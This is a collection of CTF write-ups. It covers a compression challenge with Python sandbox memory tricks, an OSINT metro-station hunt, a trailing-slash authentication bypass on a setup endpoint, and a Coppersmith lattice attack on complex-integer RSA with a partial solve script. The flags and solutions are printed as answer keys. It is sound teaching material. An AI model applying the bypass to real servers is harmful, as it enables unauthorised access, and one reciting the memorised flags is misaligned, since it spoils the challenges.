            cur_byte += 1
    return res

output = ""
while len(output) < 2028:
    word = wordmap[readbits(18)]
    for c in word:
        if c in leet_table:
            is_leet = readbits(1)
            if is_leet:
                output += leet_table[c]
            else:
                output += c
        else:
            output += c
    output += " "

while len(output) < 2048:
    output += chr(readbits(8))

sys.stdout.write(output)
sys.stdout.flush()

This worked great in preliminary testing, but failed entirely when run on the actual scoring system. The script was being passed as a base64 blob on the command line and was exceeding the maximum length of a single command-line argument. Some experimentation showed that the default maximum length was 128KB (131072 bytes) for a single argument, which translates into 96KB before base64 encoding. Thankfully, our raw wordlist is around 60KB, so my next attempt looked something like this:

wordlist = """
THE
OF
AND
TO
A
[...]
CYLINDER
WITCH
BUCK
INDICATION
EH
""".split()

def perfect_hash(w):
  [...]
wordmap = {perfect_hash(w): w for w in wordlist}

[...]

This runs, but immediately crashes before executing any code. Some debugging with strace revealed that Python was attempting to use the sbrk system call to allocate memory to compile the program (in particular, allocating space for the wordlist constant). Unfortunately, only the brk system call has been permitted through the filter, so Python’s attempt to allocate memory fails and it throws a MemoryError while compiling the code for exec.

This is much more serious than it initially appears. Without the ability to sbrk for additional memory, we’re effectively limited to only the free memory that was available before the seccomp filter was installed - and that small amount of memory has to be enough for both the compiled program and all of the variables it creates as it runs. Some experimentation suggests that we have around 120KB of free memory. Keep in mind that Python objects are quite heavyweight: per .__sizeof__(), a simple integer is 28 bytes in size, while a single-character string is 50 bytes, and both sizes are likely underestimates due to padding and malloc metadata. I also did not immediately see a way to convince Python to use brk instead of sbrk using pure Python code.

To get around this problem, I chose to smuggle the wordlist in a comment, which would not be compiled and would therefore not incur a significant memory cost. We can access the source code of our program, and thus the embedded wordlist, by walking the stack:

#THE,OF,AND,[...],BUCK,INDICATION,EH
try:
    1/0
except Exception as e:
    prog = e.__traceback__.tb_frame.f_back.f_locals["prog"]

However, we can’t even do something like wordlist = prog.split("\n")[0].split(",") due to the severe memory restrictions - 8192 strings will occupy at least 400KB (per __sizeof__()), far more than the 100KB we have available.

Instead, I took the approach of dynamically searching the wordlist for each incoming word. To avoid an expensive linear search (which would blow our CPU limit - 1 second), I sorted the wordlist by hash value, then implemented a binary search:

#,MS,MN,ME,MR,GS,MI,[...],OLYMPIC,NIGHTLIFE,HOMEWORK,NETWORK,BRUNSWICK,

try:
    1/0
except Exception as e:
    prog = e.__traceback__.tb_frame.f_back.f_locals["prog"]

table = (145,22134,14665,7025,20,43498,6070,2551,60,13988,38948,1820,30148,15,85,6351,5350,25,5,65,555,14565,2027,295,735,45643,29266,7705,42888,10966,21,4875,325,4725,53578,57958,14261,1220,29394,60128,26679,45243,275,2250,1350,23954,585,430,90,35098,11101,49537,401,51258,1,64213,10636,4410,1945,10338,2786,42248,14110,9063,51277,5,1385,330)
offs = (42,0,29,13,19,3,0,0,0,0,0)
def lookup(th):
    lo = 2
    hi = 61828
    while lo < hi:
        mid = (lo + hi) // 2
        a = prog.rfind(",", 0, mid)+1
        b = prog.find(",", mid)
        h = table[ord(prog[b-1]) - 65]
        for i in range(b-a):
            if i < len(offs):
                h += table[ord(prog[a+i]) + offs[i] - 65]
        if h < th:
            lo = mid + 1
        else:
            hi = mid
    return lo

One more final trick I used was to get a tiny bit more memory by clearing sys.argv, thereby freeing the large base64-encoded version of the program and buying around 100KB of extra memory to work with. I needed to do this because compiling the program itself still required more memory than was available:

import sys
sys.argv[:] = []

exec(r"""
[rest of the program]
""")

Putting this all together produces the final decompressor:

#,MS,MN,ME,MR,GS,MI,[...],OLYMPIC,NIGHTLIFE,HOMEWORK,NETWORK,BRUNSWICK,
import sys
# get ourselves just a little more memory to work with
sys.argv[:] = []

try:
    1/0
except Exception as e:
    prog = e.__traceback__.tb_frame.f_back.f_locals["prog"]

exec(r"""
table = (145,22134,14665,7025,20,43498,6070,2551,60,13988,38948,1820,30148,15,85,6351,5350,25,5,65,555,14565,2027,295,735,45643,29266,7705,42888,10966,21,4875,325,4725,53578,57958,14261,1220,29394,60128,26679,45243,275,2250,1350,23954,585,430,90,35098,11101,49537,401,51258,1,64213,10636,4410,1945,10338,2786,42248,14110,9063,51277,5,1385,330)
offs = (42,0,29,13,19,3,0,0,0,0,0)
def lookup(th):
    lo = 2
    hi = 61828
    while lo < hi:
        mid = (lo + hi) // 2
        a = prog.rfind(",", 0, mid)+1
        b = prog.find(",", mid)
        h = table[ord(prog[b-1]) - 65]
        for i in range(b-a):
            if i < len(offs):
                h += table[ord(prog[a+i]) + offs[i] - 65]
        if h < th:
            lo = mid + 1
        else:
            hi = mid
    return lo

leet_table = {
    'A': '4',
    'B': '8',
    'E': '3',
    'G': '6',
    'I': '1',
    'O': '0',
    'S': '5',
    'T': '7',
    'Z': '2'
}

cur_byte = 0
cur_bit = 0

def read_bits(n):
    global cur_bit, cur_byte
    res = 0
    resbits = 0
    while resbits < n:
        chunk = min(n - resbits, 8 - cur_bit)
        t = (data[cur_byte] >> cur_bit) & ((1 << chunk) - 1)
        res |= t << resbits
        resbits += chunk
        cur_bit += chunk
        if cur_bit == 8:
            cur_bit = 0
            cur_byte += 1
    return res

p = 0
while p < 2028:
    t = lookup(read_bits(18))
    while prog[t] != ",":
        c = prog[t]
        if c in leet_table and read_bits(1):
            sys.stdout.write(str(leet_table[c]))
        else:
            sys.stdout.write(c)
        t += 1
        p += 1
    sys.stdout.write(" ")
    sys.stdout.flush()
    p += 1

while p < 2048:
    print(chr(read_bits(8)), end="")
    p += 1

sys.stdout.flush()
exit(0)
""")

Conclusion

This compressor is able to encode 2048 bytes of data in around 740 bytes on average (around 1308 points), more than sufficient to top the leaderboard. Running it several times produces different results, with the best result out of several runs being 1320 points (flag: 941379cb175c2e078e9d65606fc4ef3048468e0a4d45c717094dd268c0cafb60.1320).

For “style” reasons, I decided to go a little further. Changing the constant 2028 to 2040 reduces the length of the (inefficiently-encoded) tail, at the risk of occasionally failing if the final word is too long. With this change, I was able to quickly obtain a score of 1337 points (flag: 2fdd6a0e1801daa160f5475fb710879dd3f1bf6774da6c92e8f63867849b1cef.1337). I also obtained slightly higher scores (up to 1340: d5aedd5fcd9177849ba5d174c79a7074d66f60d911338616eb044290d9081088.1340), but chose not to submit them. Here’s how the leaderboard looked like by the end of the CTF:

           Team           |     Score       |           Time             
--------------------------+-----------------+----------------------------
 Maple Bacon              | {"score": 1337} | 2024-06-30 19:24:57.567+00
 thehackerscrew           | {"score": 980}  | 2024-06-30 19:49:18.4+00
 r3kapig                  | {"score": 859}  | 2024-06-30 13:29:04.553+00
 The Flat Network Society | {"score": 856}  | 2024-06-29 17:17:16.553+00
 Team Austria             | {"score": 850}  | 2024-06-29 19:03:02.087+00
 Perperikon               | {"score": 843}  | 2024-06-29 19:59:56.281+00
 Brunnerne                | {"score": 837}  | 2024-06-30 12:09:16.699+00
 Kalmarunionen            | {"score": 649}  | 2024-06-30 15:04:40.344+00
 pwnlentoni               | {"score": 603}  | 2024-06-30 10:46:12.362+00
 gsitcia                  | {"score": 512}  | 2024-06-30 01:46:13.402+00

This was a very fun challenge, with a rather unexpected twist in the form of some harsh restrictions on the Python side. Here’s a summary of the solution:

Use gperf to produce a perfect hash function for the wordlist, which can be efficiently implemented in C and compiled with the XC8 compiler.
The compressor outputs 18 bits per word (regardless of word length), plus one bit per 1337-speakable character in the word.
On the decompressor side, smuggle the entire wordlist in a comment to keep the overall size under the command-line argument size, and to avoid blowing the memory limit during exec.
Obtain access to the embedded wordlist by extracting the prog variable from the parent stack frame via an exception object.
Clear sys.argv to free up a bit more memory, and use a nested exec to avoid immediately blowing the memory limit in the outer exec.
Use a binary search to search the wordlist each time, to avoid allocating more than O(1) extra memory, and avoid blowing the CPU time limit on an expensive (but simple) linear search.
Use a slightly more aggressive implementation with a small probability of failure in order to score exactly 1337 points (“style”).

[R3CTF/YUANHENGCTF-2024] Transit

2024-06-15T00:00:00+00:00

R3CTF/YUANHENGCTF 2024 Transit Challenge [MISC]

Authors: Jade Lovelace, Frank Yan

TL;DR

Utilize the overhead signage to identify the city and metro system. Scan through local Chinese media for any images of local metro rolling stock. Use the rolling stock number to identify the line and stations. Use the street view images and line schematic to identify the station.

Challenge Description

This is an OSINT chal! The city’s rail transit is like the veins of time, glides effortlessly through the concrete jungle, transforming every journey into a flowing tapestry. So which station is this?

The flag format is R3CTF{city_lowercase_name_endswith_station}. For example the Huixin Xijie Nankou station of the Beijing Subway would be R3CTF{beijing_huixin_xijie_nankou_station}.

The Image

Solution

We took the image and stared at it to try to figure out if it was a metro or mainline railway. Our main hint that it was a metro is the grade in the background but we kinda just guessed.

We looked at the overhead signage identifying the supports for the catenary, and noticed that it was in two parts, the first one seemingly being track ID or segment ID or so, and the second one being sequential as you go along the line, as seen in the picture.

We decided to do this by just dorking wikipedia and googling around for Chinese metros looking for ones that use the same style of trackside signage for their overhead lines.

Google results usually yield schematic subway maps of the system. Thankfully Frank does read Chinese, and Baidu is more helpful in giving out images of rolling stock on tracks.

We started out with “[Name of tier one/two Chinese cities] + 地铁轨道交通 + 铁轨 (subway transportation system + railtracks)” and have found some images.

Shanghai does not have visible hanging signs on overhead powerlines.

Beijing does use a few hanging signs, but they are usually three digit numbers on a blue background.

Chengdu on the other hand, uses a three character system with the first letter being an alphabet. Although the colorscheme does resemble to the image (black letters on white), it uses a different font with wider characters.

After going through an exhaustive list of tier one and two Chinese cities, we stumbled upon a picture from Hangzhou’s metro system.

It has an overhead signage that actually match the same track segment, M368.

We now have the rolling stock number 190181 and the line color turquoise blue. Given that the majority of Chinese systems use a numbered system to name metro lines and associate a unique color to each line, we are getting closer to the flag.

We then went on Wikipedia looking at Hangzhou metro, to figure out which line it was by looking at the rolling stock and found it was line 19:

Line 19 is an airport express line that only partially opened in 2022. Baidu Baike tells us that there are four elevated stations on line 19.

高架 means elevated while 地下 means underground. This helps us to narrow down to

御道站(Yudao Station)
平澜路站 (Pinglan Road Station)
耕文路站 (Gengwen Road Station)
知行路站 (Zhixing Road Station)

While these stations all share the common features of being elevated and running in parallel along the Hangyong Expressway (the viaduct in the picture).

We decided to further examine the street view at each of the four sites.

平澜路站 (Pinglan Road Station) provides a view of a four-lane highway with rows of trees densely lined to its sides. We decided to move on to the other three stations, but the same highway is repeated throughout.

Until we realized…

These images are from August 2017.

Clearly, given China’s otherworldly pace of construction, most information from 2017 can be considered to be outdated.

Hence, we just tried to input the names of the four stations.

Flag

R3CTF{hangzhou_zhixing_road_station}

[NahamCon CTF 2024] Helpful Desk

2024-06-01T00:00:00+00:00

Problem Description

HelpfulDesk is the go-to solution for small and medium businesses who need remote monitoring and management. Last night, HelpfulDesk released a security bulletin urging everyone to patch to the latest patch level. They were scarce on the details, but I bet that can’t be good…

This was categorized as a web challenge, although most of my time on it was spent reverse engineering.

Difficulty: easy

Initial Research

Opening up the URL, we see this is supposed to be a login to a remote access software. There’s a note at the top telling us to download the latest update for important security fixes. Clicking the note brings us to an “updates” page with a list of releases we can download. Presumably the current instance is running the old insecure version, so let’s download it and the latest and find the difference.

Exploring the codebase

Downloading the two versions and unzipping them, we see this is a .NET server. Running diff on the folders, we see the only thing that has changed is HelpfulDesk.dll.

Decompiling

Let’s decompile the old and new versions of the DLL with AvaloniaILSpy. Renaming the dlls for convenience to HelpfulDesk-old and HelpfulDesk-new, we can conveniently export the decompiled code to a flat text file by right-clicking each dll and choosing “Save Code.”

Now we can open both files in Emacs and use ediff to find the changes. After skipping through the filenames and a few uninteresting hashes, we only find one significant change:

HelpfulDesk-new.dll

  public IActionResult SetupWizard()
  {
      //IL_0018: Unknown result type (might be due to invalid IL or missing references)
      //IL_001d: Unknown result type (might be due to invalid IL or missing references)
      if (File.Exists(_credsFilePath))
      {
          PathString path = ((ControllerBase)this).get_HttpContext().get_Request().get_Path();
          string text = ((PathString)(ref path)).get_Value().TrimEnd('/');
          if (text.Equals("/Setup/SetupWizard", StringComparison.OrdinalIgnoreCase))
          {
              return (IActionResult)(object)((Controller)this).View("Error", (object)new ErrorViewModel
                                                                    {
                                                                        RequestId = "Server already set up.",
                                                                        ExceptionMessage = "Server already set up.",
                                                                        StatusCode = 403
                                                                    });
          }
      }
      return (IActionResult)(object)((Controller)this).View();
  }

HelpfulDesk-old.dll

  public IActionResult SetupWizard()
  {
      //IL_0018: Unknown result type (might be due to invalid IL or missing references)
      //IL_001d: Unknown result type (might be due to invalid IL or missing references)
      if (File.Exists(_credsFilePath))
      {
          PathString path = ((ControllerBase)this).get_HttpContext().get_Request().get_Path();
          string value = ((PathString)(ref path)).get_Value();
          if (value.Equals("/Setup/SetupWizard", StringComparison.OrdinalIgnoreCase))
          {
              return (IActionResult)(object)((Controller)this).View("Error", (object)new ErrorViewModel
                                                                    {
                                                                        RequestId = "Server already set up.",
                                                                        ExceptionMessage = "Server already set up.",
                                                                        StatusCode = 403
                                                                    });
          }
      }
      return (IActionResult)(object)((Controller)this).View();
  }

Exploit

I don’t know the exact mechanisms here, but at a high level it seems to be controlling access to the /Setup/SetupWizard endpoint. If the credential file exists, it denies access to the endpoint. Presumably the SetupWizard lets us reset credentials, so this ensures only the admin doing the initial setup can access it.

The difference between the function in the old and new files is that the new one strips trailing slashes from /Setup/SetupWizard. We can see the security flaw: if we navigate to the path with the trailing slash, the value.Equals() won’t be triggered, but ASP.NET will ignore the slash and serve us the Setup page.

Giving it a try, this works! I get the setup page and reset the login credentials. I then login and find the flag on the first connected computer’s desktop.

[SDCTF 2024] ReallyComplexProblem

2024-05-19T00:00:00+00:00

Problem Description

We have a ciphertext that we have to decrypt in 48 hours. Luckily, one of our guys at the NSA was able to take a screenshot of the computer as it was performing the encryption, unfortunately it only captured part of the screen. Can you help us break the cipher?

Difficulty: Hard
Tags: Crypto
author: 18lauey2

Attachments

CRSA.py LEAK.png

TL;DR

Modified coppersmith method that converts the complex valued matrix into a real matrix through a canonical embedding and solve it like normal.

Introduction, audience, and pre-requisites

This writeup, like most of my writeups, is geared towards people with an elementary understanding of Math. Additionally, this writeup focuses on the logic behind the solution as opposed to just the solution.

The pre-requisites that would be nice to know before reading this are:

The RSA encryption and decryption scheme Basic modular arithmetic Matrix algebra (vectors, linear combinations, and
matrices) An elementary understanding of complex numbers

Alright then. Sit tight and buckle up because we are in for a doozy!

Challenge Overview and Inspecting the Code

The challenge performs RSA with complex integers (Gaussian Integers: $\mathbb{Z}[i]$) as opposed to regular Integers $\mathbb{Z}$. A Complex integer is a complex number $a + bi$ such that $a, b \in \mathbb{Z}$.

Fortunately, the logic behind the algorithm, Complex-RSA (CRSA), remains fairly familiar with a few caveats:

We say that a Gaussian integer $w$ is prime if its norm is prime.
- “What’s a norm?” In this case, consider a norm to be defined as $Re(w)^2 + Im(w)^2$. (This can be interpreted,
geometrically, as the square of the point’s distance from the origin) Once we generate our primes p and q, the rest of the process is the same as regular RSA. (I’m skipping over details for modular exponentiation because it’s not relevant to the challenge)

The second part of the challenge involves our LEAKed picture which features a terminal with output that reads the values of N, ciphertext, and a some portion of p. Interestingly enough, we see about two-thirds of both the real and the imaginary part of p with the rest covered by the beautiful hand-drawn raccoon

But we’re missing bits! Now what?

You’re right. There is still a bit of work to do if we would like to decrypt our message. Alright, let’s take a deep breath and work step-by-step. What information do we need to retrieve the original plaintext m.

To decrypt a message we need d which is defined as e^-1 (mod (norm(p)-1)*(norm(q)-1)). To find d, we need p and q which in turn require us to factor N = pq. To factorize N, we would need “recover” p from the information that was leaked and divide N by p.

Oh boy. That’s a lot. All these steps are fairly straightforward with the exception of recovering p. So, our goal is to recover this value.

After some painful counting and testing, There’s roughly about 155 digits for both the real and imaginary parts. we have about 85 and 87 of these digits respectively. (Okay, maybe it wasn’t two-thirds…)

Retrieving these missing bits seems hard. Let’s consider a simpler problem: What if this was regular RSA and we had about 60% of p. As it turns out, someone has solved this problem before.

A Copper sword crafted by the kingdom’s finest blackSmith

Enter the Coppersmith method. In a nutshell, the method finds small integer roots of polynomials modulo a given integer. To clarify, this means that if we have a polynomial of the form $F(x) = x^n + a_{n-1}x^{n-1} + … + a_1x + a_0$ where $a_i \in \mathbb{Z \text{ (mod N)}}$, and we know that there exists some integer $x_0$ such that $F(x_0) \equiv 0 \text{ (mod N)}$ and $|x_0|$ is less than $N^{\frac{1}{n}}$, we can find $x_0$.

You might be wondering, “cool fact. What does this have to do with us?” The answer is everything. Let me take you through this step-by-step.

Recall that we have knowledge of N, the fact that N = p * q, and a fair chunk of p (let’s say about 110 digits of 155 digits).
We can express p as follows p = the_known_part + the_unknown_part. Mathematically, $p = a + r$ where a and r are the known and unknown parts of p respectively.
- For example if p = 382xx, we would express it as $p = 38200 + r$.
We also have that $r$ is less than $10^{45}$ since $r$ has 45 digits. Thus, we get an upper bound $R = 10^{45}$.
Let’s create a polynomial $f(x)$ modulo $p$. We will define $f(x) = a + x$ where $a$ is a constant which represents the known part of $p$.
- In the definition of the method above, $n = 1$ (aka the degree of the polynomial we must solve)
Now, $f(r) = a + r = p \equiv 0 \text{ (mod p)}$. In other words, $r$ is our small ineger root $x_0$ from the definition above.
Note, that $r$ is less than $R$ which is less than $p^{\frac{1}{1}} = p^1$ which is less than $N$.
YAY! This is literally what the Coppersmith method needs to work.

The Coppersmith Attack is truly one of the attacks of all time

Now that we have the pieces, let’s apply the coppersmith method to find our $x_0$ ($r$). Firstly, it’s good to understand a bit of our motivation here. It is very difficult to find the roots of an integer polynomial over some modulo N. However, it is extremely trivial (relatively) to find the roots of the same polynomial over the integers. The method takes in our polynomial $f(x)$ performs a bit of magic and in combination with the Howgrave-Graham theorem it converts our polynomial modulo N to a simple polynomial with the same small roots over the integers (no modulo).

The Howgrave-Graham Theorem

Okay, so the (extremely abridged version of) Howgrave-Graham Theorem states that for a polynomial $g(x)$, if:

$g(x_0) \equiv 0 \text{ (mod }b^k\text{)}$ for some $b, k$
$abs(x_0) \le R$ Where R is the upper bound we discussed earlier
The length of the coefficient vector of $g(R \cdot x)$ is small. (The coefficient vector refers to the vector containing the coefficients of each term in our polynomial $[a_n, a_{n-1}, …, a_1, a_0]$.)
- Small is once again defined as being less than some bound based on $b, k$ and the degree of $g(x)$. However, it’s not relevant to us because we will fulfill it at the end. (Haha! this might be forshadowing)

then $g(x_0) = 0$ over the integers too. That is, $x_0$ is an integer root.

Great! let’s use this on $f(x)$. Well… we can’t use it just yet because the coefficients of the polynomial $f(R\cdot x)$ are huge. In particular, the constant term $a$ is the same number of digits of $p$. This fails the third condition in the Howgrave-Graham theorem which wants a small coefficient vector. Fortunately, there’s a way to fix this.

Reducing the Size of our Massive Polynomials

At first glance, it seems difficult to do reduce the size of our coefficients. However, all we need is a small cameo from our good old friend: linear combinations.

Suppose I had two polynomials $a(x)$ and $b(x)$ such that $a(x_0) \equiv b(x_0) \equiv 0 \text{ (mod m)}$ for some integers $m$ and $x_0$. Note that $a(x_0)$ doesn’t neccessarily equal $b(x_0)$. Now, we have that $a(x_0) + b(x_0) \equiv 0 \text{ (mod m)}$. Trivially, we also have that $l \cdot a(x_0) \equiv 0 \text{ mod(m)}$ for any integer $l$. Thus, for any integers $l$ and $k$, we get $l \cdot a(x_0) + k \cdot b(x_0) \equiv 0 \text{ mod(m)}$. So

In summary, we just showed that any integer linear combination of two polynomials preserves (or has the same) the root $x_0$ over our modulus $m$. So, this means that if we can find other polynomials which has the same root, x_0, as $f(Rx)$ (and $f(x)$) modulo $p$, then we can craft an integer linear combination between them to reduce the size of our coefficients. (Note: this is similar to the idea of row reductions in matrix algebra).

A Trick to Create Unlimited Polynomials

Our long chain of dominos continues as we search for polynomials with the same root $x_0$ as $f(x)$ over our modulus p. For convenience, I will call this set of polynomials $F$. The problem is we don’t know $p$, so we can’t make polynomials like $g(x) = px^2 + 4px + p^3$ which will always be 0 for all values of $x$. (They’re not particularly useful either). Let’s use some clever tricks instead.

Firstly, we know $N$ which is a multiple of $p$ so $g(x) = N \equiv 0 \text{ (mod p)}$ for all $x$ including $x_0$. Let’s add it to $F$.
Next, we have that $f(x_0) \equiv 0 \text{ (mod p)}$. We could square both sides and get: $[f(x_0)]^2 \equiv 0 \text{ (mod p)}. Nice! Let’s add $[f(Rx)]^2$ to $F$.
Why stop there? We can just continue raising $f(Rx)$ to various ineger powers and have the same outcome as above. We can thus add all the powers of $f(Rx)$ to $F$.

Now, we have a long list of polynomials to choose from. An alternative to this method would be to simply multiply $f(Rx)$ by different powers of $x$. However, the downside to this method is that we would lose our constant term in the elements of $F$. The powers of $f(Rx)$ is much more elegant in the sense that due to the binomial theorem, we are bound to have constant terms.

The Magical Mysteries of the Lattice and LLL

We have a list of polynomials with the same root $x_0$ whose coefficients we seek to reduce through their integer linear combinations. It remains to be asked: “How do we determine the most efficient integer linear combinations”. It’s time to introduce Lattices and LLL.

Introducing our New Show: DeComplexify This!

Today, we will be learning what a Lattice and how LLL might help our little predicament. Recall that if we were working with the Real numbers, we could simply use a matrix to reduce the size of a basis and make it orthogonal using the gram schmidt method. However, we are working over the Integers where the same strategy cannot be used.

Introducing the Lattice. No, not the lattice from Organic Chemistry. An n x n (integer) lattice is essenitally just like a n x n matrix with two exceptions:

All the elemwents in our lattice are integers
The Span of our vectors refers to just the integer linear combinations. (Instead of real coefficients for matrices).

To clarify: We will exclusively be talking about integer lattices, hereby referred to as just lattices.

Like a matrix, we can put express our polynomial f(Rx) in the form of a row vector. In fact, you’ve already seen this before in the form of our coefficient vectors.

We can create a matrix using some of our polynomials in $F$ where each row is a polynomial and each column is represents the coefficients of a power of $x$. We can create a matrix using the polynomials $g(x) = N$, $f(Rx)$, $[f(Rx)]^2$.

Now that we have constructed our lattice, let me introduce the LLL algorithm (Lenstra-Lenstra-Lovász). I won’t be going over the nitty-gritty details of this algorithm and will instead treat this as a black box. This algorithm takes in a lattice basis (Basis has the same meaning as in matrix algebra) and outputs a lattice with a more orthogonal and smaller basis. You can read about it more in this wonderful tutorial. A fun exercise is justifying to yourself that our row vectors are linearly independent to each other.

Once we apply the LLL algorithm on this lattice, our rows, representing polynomials, will now have smaller coefficients. Since the length of our coefficient vector is smaller (by definition of LLL), we can apply Howgrave-Graham’s theorem in order to find $x_0$ by finding the roots of $h(x)$ over the integers. Note that the resulting row vectors will be of the form $h(Rx)$. We simply divide each coefficient by $R$ to retrieve $h(x)$.

We have succesfully found $r$ (our $x_0$) and we can reconstruct $p$ by $a + r$. Victory! We solved our simpler RSA problem. Now, to deal with something more complex. (literally)

The Complexities of Complex Numbers

The question now is: “Can we do the same for our complex integers?” The answer is mostly. While most of the theorems extends out to the Complex Integers, LLL only operates over the regular integers. To understand how we overcome this problem, let’s first go through our solution till our roadblock.

Write down N and the known part of p

N = -117299665605343495500066013555546076891571528636736883265983243281045565874069282036132569271343532425435403925990694272204217691971976685920273893973797616802516331406709922157786766589075886459162920695874603236839806916925542657466542953678792969287219257233403203242858179791740250326198622797423733569670 + 617172569155876114160249979318183957086418478036314203819815011219450427773053947820677575617572314219592171759604357329173777288097332855501264419608220917546700717670558690359302077360008042395300149918398522094125315589513372914540059665197629643888216132356902179279651187843326175381385350379751159740993*I
a = 1671911043329305519973004484847472037065973037107329742284724545409541682312778072234 * 10^70 + 193097758392744599866999513352336709963617764800771451559221624428090414152709219472155 * 10^68 * I

At the same time as finding a, we can define our upper bound $R$ as $R_r$ and $R_i$ for the bound of the real and imaginary part of r. Since the primes will always have about 155 digits (this could be verified with a bit of testing/bruteforcing other limits).
Our $f(x) = a + x$. Instead of this, we can choose to be more verbose and write it as $a + bi + x + i \cdot x$. Here, we treat $i$ similar to a variable and all the coefficients (like $a$ and $b$) are real integers.
We do the same process as before to generate different powers of $f((R_r + R_i \cdot i)x)$ modulo p. (refer to the challenge code to see how you can take the modulo under a complex number)
Now, we hit our roadblock of representing our polynomials as row vectors of integers. Well, we could simply double the columns (adding an imaginary part to each power of $x$). This looks like…
- one more note is that we can double our set from before by adding the imaginary multipe of $f$ such as $-i\cdot f(Rx)$
Construct a matrix with a lot of these row vectors and perform LLL.
- The reason we need a lot of polynomials has to do with the Howgrave-Graham theorem which essenitally ends up equating to us requiring more rows to have a greater chance of finding our root.
find the root of the reduced polynomial over the Complex Integers.
Retrieve r and thus find $p$

Use $p$ to find $q$ and then find $d$ and use $d$ to decrypt our ciphertext given by:

e = 65537
ciphertext = 49273345737246996726590603353583355178086800698760969592130868354337851978351471620667942269644899697191123465795949428583500297970396171368191380368221413824213319974264518589870025675552877945771766939806196622646891697942424667182133501533291103995066016684839583945343041150542055544031158418413191646229 - 258624816670939796343917171898007336047104253546023541021805133600172647188279270782668737543819875707355397458629869509819636079018227591566061982865881273727207354775997401017597055968919568730868113094991808052722711447543117755613371129719806669399182197476597667418343491111520020195254569779326204447367 * I

Wow, we did it! oh no… It did not work :(

WHY DOESNT IT WORK!!

The short answer is that we need to modify our choice of polynomials because it still fails the conditions for the Howgrave-Graham Theorem. Recall that the Howgrave theorem limits us on our choices of $b$, $k$, and the degree of the polynomial. For the theorem, we need $f(x_0) \equiv 0 \text{ (mod }b^k\text{)}$. Previously, we just set $b^k = p$ and called it a day. However. However, through a long series of proofs that are very well highlighted on this blog, this can be very inefficient and makes it such that the maximum upper bound for $R$ ends up being very small. The maximum bound is usually defined by some relation $X \approx N^\frac{1}{c(d)}$ where $c(d)$ is a function that depends on the degree, $d$, of our polynomial. Understanding this, our goal would be to reduce the the growth of $c(d)$ as much as possible. We will be using two techniques to do this (from the same blog post).

The First Technique:

Rather than considering $b^k = p$, we could instead try $b = p$. This would ultimately help increase our upper bound (as described in the blog if you are curious). What changes? Well, unfortunately $f(x_0) \equiv 0 \text{ (mod }p^k\text{)}$ is no longer true. However, this might actually be useful.

I will leave this as an exercise to the curious readers, but it’s trivial to observe that if an integer $a$ divides $b$, then $a^k$ divides $b^k$. Also, if $a$ divides $c$, then $a^k$ divides $c^{i}b^{k - i}$ for some $i \in \mathbb{Z}$ that is less than $K$ and greater than zero. This implies that if we have two polynomials $a(x)$ and $b(x)$ such that $a(x_0) \equiv b(x_0) \equiv 0 \text{ (mod m)}$ for some integer $m$, then $[a(x_0)]^i[b(x_0)]^{k - i} \equiv 0 \text{ (mod }m^k\text{)}$.

So, let’s use the two polynomials we know are divisible by $p$ at $x_0$: $N$ and $f(Rx)$. (yes, N is a polynomial that equates to a constant.) Now, instead of using powers of $f(x)$, we can instead add polynomials of the form $[f(Rx)]^i[N]^{k - i}$ for each integer $i \in [0, k - 1]$ to our set $F$.

Note that for our complex integers, whenever I add a polynomial $g(x)$ to $F$, I’m also adding its imaginary multiple $-i\cdot g(x)$ to the set. This simply helps with the lattice reduction by giving the LLL algorithm more options to reduce our polynomials by.

Technique Numero Dos:

The second technique, which was discussed directly in the blog, involves multiplying $[f(Rx)]^k$ with various powers of $x$. Recall that $[f(x_0)]^k \equiv 0 \text{ (mod }p^k\text{)}$.So, we add polynomials of the form $[N]^i[f(Rx)]^k $ for each integer $i \in [0, k - 1]$ to our set $F$ (along with its imaginary multiples. Note that there’s nothing really stopping us from taking a different number of polynomials for the second technique, rather than $k - 1$ polynomials we can take $5$ or $4000$. Though I’m not sure what those bounds would be.

Back to business

Now that we have created a better lattice, we can finally solve our challenge. Nevermind! There’s a lot of sage-specific bugs that had to be squashed.

hours later, we can finally use our script to reverse the encryption and encoding to get our flag.

The solve script (finally)

from CRSA import GaussianRational, decrypt
from fractions import Fraction
from Crypto.Util.number import long_to_bytes

ciphertext = 49273345737246996726590603353583355178086800698760969592130868354337851978351471620667942269644899697191123465795949428583500297970396171368191380368221413824213319974264518589870025675552877945771766939806196622646891697942424667182133501533291103995066016684839583945343041150542055544031158418413191646229 - 258624816670939796343917171898007336047104253546023541021805133600172647188279270782668737543819875707355397458629869509819636079018227591566061982865881273727207354775997401017597055968919568730868113094991808052722711447543117755613371129719806669399182197476597667418343491111520020195254569779326204447367 * I
N = -117299665605343495500066013555546076891571528636736883265983243281045565874069282036132569271343532425435403925990694272204217691971976685920273893973797616802516331406709922157786766589075886459162920695874603236839806916925542657466542953678792969287219257233403203242858179791740250326198622797423733569670 + 617172569155876114160249979318183957086418478036314203819815011219450427773053947820677575617572314219592171759604357329173777288097332855501264419608220917546700717670558690359302077360008042395300149918398522094125315589513372914540059665197629643888216132356902179279651187843326175381385350379751159740993*I
a = 1671911043329305519973004484847472037065973037107329742284724545409541682312778072234 * 10^70 + 193097758392744599866999513352336709963617764800771451559221624428090414152709219472155 * 10^68 * I


# This function takes in our polynomial and returns two rows
# The first row is the coefficient vector, scaled by the uppper bounds, of the regular polynomial 
# The second row is the coefficient vector, scaled by the upper bounds, of its imaginary multiple
def get_coefficients(f, R_r, R_i):
     regular = []
     imag_multiple = []
     coeffs = f.list()

     for i, c in enumerate(coeffs):
         regular.extend([c.real() * R_r^i, c.imag() * R_i^i])

     for i, c in enumerate(coeffs):
         imag_multiple.extend([-1 * c.imag() * R_r^i, c.real() * R_i^i])

     return [regular, imag_multiple]

# since our row vectors have different lengths, we need to pad them with zeros
# Note that the solve script reverses the columns. The leftmost column is the constant while
# the rightmost column is the coefficient of the highest degree of x
def rpad(lst, length):
    result = []
    for l in lst:
        result.append(l + [0 for i in range(length - len(l))])
    return result


def coppersmith(f, R_r, R_i, N,  k):
    # This was the maximum number of columns/entries a row vector has.
    max_cols = 4 * k
    # polynomial row vectors
    polynomial_rows = []
    x = f.parent().gen(0) # apparently helps sage do its thing

    # Add polynomials from our first technique
    for i in range(k):
        poly_rows = get_coefficients(f^i * N^(k-i), R_r, R_i)
        poly_rows = rpad(poly_rows, max_cols)
        polynomial_rows.extend(poly_rows)

    # Add polynomials from our second technique
    for i in range(k):
        poly_rows = get_coefficients(f^k * x^i, R_r, R_i) 
        poly_rows = rpad(poly_rows, max_cols)
        polynomial_rows.extend(poly_rows)
    
    # We perform LLL on our lattice
    M = matrix(polynomial_rows)
    B = M.LLL()
